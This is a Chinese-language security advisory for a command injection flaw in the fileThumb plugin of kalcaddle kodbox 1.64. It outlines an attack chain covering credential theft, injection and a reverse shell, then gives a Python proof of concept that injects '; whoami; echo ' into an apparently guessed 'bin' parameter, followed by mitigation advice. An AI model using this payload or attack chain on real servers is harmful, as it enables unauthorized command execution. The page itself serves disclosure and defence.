CVE-2026-4591 CVSS 4.7 中危

CVE-2026-4591 kalcaddle kodbox 远程命令执行漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4591

漏洞类型

操作系统命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

kalcaddle kodbox

漏洞概述

kalcaddle kodbox 1.64版本存在安全漏洞，位于fileThumb组件的checkBin函数中。由于对用户输入过滤不严，攻击者可构造恶意请求执行OS命令注入。该漏洞需高权限利用，可导致服务器被远程控制。厂商尚未回应修复，建议用户尽快关注安全动态。

技术细节

该漏洞源于kalcaddle kodbox 1.64版本中`/workspace/source-code/plugins/fileThumb/app.php`文件的`checkBin`函数。该函数设计用于检查系统二进制文件的存在性，但在实现过程中，直接将用户可控的参数拼接到系统命令中执行，未进行严格的过滤或转义处理。攻击者可通过发送特制的HTTP请求，在参数中注入Shell元字符（如分号、管道符等）。当后端程序调用系统命令（如exec或system）时，注入的恶意代码将被服务器操作系统解析并执行。由于CVSS评分要求权限为高（PR:H），攻击者通常需要登录系统并获取一定权限后方可发起攻击。成功利用该漏洞可导致机密性、完整性和可用性受到低程度影响，即获取服务器部分控制权。

攻击链分析

STEP 1

信息收集

攻击者识别出目标服务器运行的是kalcaddle kodbox 1.64版本。

STEP 2

获取凭证

由于漏洞利用需要高权限（PR:H），攻击者通过钓鱼或暴力破解获取管理员或高权限用户的账户凭证。

STEP 3

发送攻击载荷

攻击者使用获取的凭证登录，并向`/workspace/source-code/plugins/fileThumb/app.php`接口发送特制的HTTP POST请求，在参数中注入恶意命令。

STEP 4

执行命令

服务器后端`checkBin`函数未过滤输入，直接拼接并执行系统命令，导致攻击者的恶意代码在服务器端运行。

STEP 5

建立控制

攻击者利用执行的命令反弹Shell或读取敏感文件，实现对服务器的初步控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://127.0.0.1/kodbox/index.php"

# Exploit endpoint based on vulnerability description
endpoint = "/plugin/fileThumb/checkBin"

# Since PR:H is required, a valid session cookie is needed
cookies = {
    "PHPSESSID": "<valid_admin_session_id>"
}

# Payload to execute OS command injection
# Example: checking 'whoami' or listing files
# The parameter 'bin' is hypothetical based on function name 'checkBin'
payload = {
    "bin": "; whoami; echo "
}

try:
    response = requests.post(target_url + endpoint, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

kalcaddle kodbox 1.64

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用fileThumb插件以阻断攻击路径。同时，应加强访问控制，确保只有受信任的IP或用户才能访问管理后台。在Web应用防火墙（WAF）上部署针对命令注入攻击的检测规则，拦截包含Shell元字符的恶意请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4591
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4591
3 Details https://www.cvedetails.com/cve/CVE-2026-4591/
4 VulDB https://vuldb.com/cve/CVE-2026-4591
5 Link https://vuldb.com/?ctiid.352427
6 Link https://vuldb.com/?id.352427
7 Link https://vuldb.com/?submit.775470
8 Link https://vulnplus-note.wetolink.com/share/3ml5XA0firIa

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表